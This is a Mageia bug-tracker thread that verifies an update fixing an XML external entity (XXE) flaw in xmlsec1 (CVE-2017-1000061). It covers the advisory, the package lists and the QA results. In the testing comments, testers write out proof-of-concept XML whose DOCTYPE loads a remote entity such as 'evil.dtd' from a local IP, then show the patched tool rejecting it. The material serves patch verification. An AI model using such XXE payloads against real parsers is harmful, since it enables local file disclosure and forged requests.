RedHat has issued an advisory today (August 21): https://access.redhat.com/errata/RHSA-2017:2492 Mageia 5 and Mageia 6 are also affected.
Whiteboard: (none) => MGA6TOO, MGA5TOO
Assigning to all packagers collectively, since there is no registered maintainer for this package.
Assignee: bugsquad => pkg-bugsCC: (none) => marja11
CC: (none) => mageiaVersion: Cauldron => 6CVE: (none) => CVE-2017-1000061Whiteboard: MGA6TOO, MGA5TOO => MGA5TOO
pushed in updates_testing src.rpm: xmlsec1-1.2.24-1.mga5 xmlsec1-1.2.24-1.mga6
Assignee: pkg-bugs => qa-bugs
Advisory: ======================== Updated xmlsec1 packages fix security vulnerability: It was discovered xmlsec1's use of libxml2 inadvertently enabled external entity expansion (XXE) along with validation. An attacker could craft an XML file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs, leading to information disclosure or denial of service (CVE-2017-1000061). References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061 https://access.redhat.com/errata/RHSA-2017:2492 ======================== Updated packages in core/updates_testing: ======================== xmlsec1-1.2.24-1.mga5 libxmlsec1_1-1.2.24-1.mga5 libxmlsec1-openssl1-1.2.24-1.mga5 libxmlsec1-nss1-1.2.24-1.mga5 libxmlsec1-gnutls1-1.2.24-1.mga5 libxmlsec1-gcrypt1-1.2.24-1.mga5 libxmlsec1-devel-1.2.24-1.mga5 xmlsec1-1.2.24-1.mga6 libxmlsec1_1-1.2.24-1.mga6 libxmlsec1-openssl1-1.2.24-1.mga6 libxmlsec1-nss1-1.2.24-1.mga6 libxmlsec1-gnutls1-1.2.24-1.mga6 libxmlsec1-gcrypt1-1.2.24-1.mga6 libxmlsec1-devel-1.2.24-1.mga6 from SRPMS: xmlsec1-1.2.24-1.mga5.src.rpm xmlsec1-1.2.24-1.mga6.src.rpm
Testing this on mga5::x86_64, later.
CC: (none) => tarazed25
mga5 x86_64 CVE-2017-1000061 PoC for XML External Entity attack. https://github.com/lsh123/xmlsec/issues/43 Created file xinput.xml $ cat xinput.xml <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;]> Fake command: $ xmlsec1 --verify --output output.xml input.xml input.xml:1: I/O warning : failed to load HTTP resource TYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote; ^ %remote; ^ input.xml:2: parser error : Start tag expected, '<' not found ^ Error: failed to parse xml file "input.xml" Error: failed to load document "input.xml" ERROR SignedInfo References (ok/all): 0/0 Manifests References (ok/all): 0/0 Error: failed to verify file "input.xml" Updated from Core Updates testing: - lib64xmlsec1-devel-1.2.24-1.mga5.x86_64 - lib64xmlsec1-gcrypt1-1.2.24-1.mga5.x86_64 - lib64xmlsec1-gnutls1-1.2.24-1.mga5.x86_64 - lib64xmlsec1-nss1-1.2.24-1.mga5.x86_64 - lib64xmlsec1-openssl1-1.2.24-1.mga5.x86_64 - lib64xmlsec1_1-1.2.24-1.mga5.x86_64 - xmlsec1-1.2.24-1.mga5.x86_64 $ xmlsec1 --verify --output output.xml copy.xml func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='localhost:/glabel.xml'; xml error: 0: NULL copy.xml:2: parser error : Start tag expected, '<' not found ^ func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=copy.xml; xml error: 4: Start tag expected, '<' not found Error: failed to parse xml file "copy.xml" Error: failed to load document "copy.xml" ERROR SignedInfo References (ok/all): 0/0 Manifests References (ok/all): 0/0 Error: failed to verify file "copy.xml" That appears to have worked. The updated software refuses to entertain External Entities.
Continuing from comment 5. xmlsec1 looks like a standalone and $ urpmq --whatrequires lib64xmlsec1_1 lib64aqebics0 lib64xmlsec1-devel lib64xmlsec1-gcrypt1 lib64xmlsec1-gnutls1 lib64xmlsec1-nss1 lib64xmlsec1-openssl1 lib64xmlsec1_1 xmlsec1 shows that the library is required by other libraries. Giving this the OK based on a clean install and a positive PoC test.
Whiteboard: MGA5TOO => MGA5TOO MGA5-64-OK
mga6 X86_64 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.3/evil.dtd"> %remote;]> $ xmlsec1 --verify --output output.xml input.xml error : Operation in progress input.xml:1: I/O warning : failed to load external entity "http://192.168.3.1/evil.dtd" !DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote; ^ %remote; ^ input.xml:3: parser error : Start tag expected, '<' not found ^ Error: failed to parse xml file "input.xml" Error: failed to load document "input.xml" ERROR SignedInfo References (ok/all): 0/0 Manifests References (ok/all): 0/0 Error: failed to verify file "input.xml" After updating the xml packages: $ xmlsec1 --verify --output output.xml input.xml func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='http://192.168.3.1/evil.dtd'; xml error: 0: NULL input.xml:3: parser error : Start tag expected, '<' not found ^ func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=input.xml; xml error: 4: Start tag expected, '<' not found Error: failed to parse xml file "input.xml" Error: failed to load document "input.xml" ERROR SignedInfo References (ok/all): 0/0 Manifests References (ok/all): 0/0 Error: failed to verify file "input.xml" This is good for 64-bits.
Whiteboard: MGA5TOO MGA5-64-OK => MGA5TOO MGA5-64-OK MGA6-64-OK
Validating under temporary policy as we have 1 test per release.
Keywords: (none) => validated_updateWhiteboard: MGA5TOO MGA5-64-OK MGA6-64-OK => MGA5TOO MGA5-64-OK MGA6-64-OK advisoryCC: (none) => lewyssmith, sysadmin-bugs
An update for this issue has been pushed to the Mageia Updates repository. http://advisories.mageia.org/MGASA-2017-0305.html
Status: NEW => RESOLVEDResolution: (none) => FIXED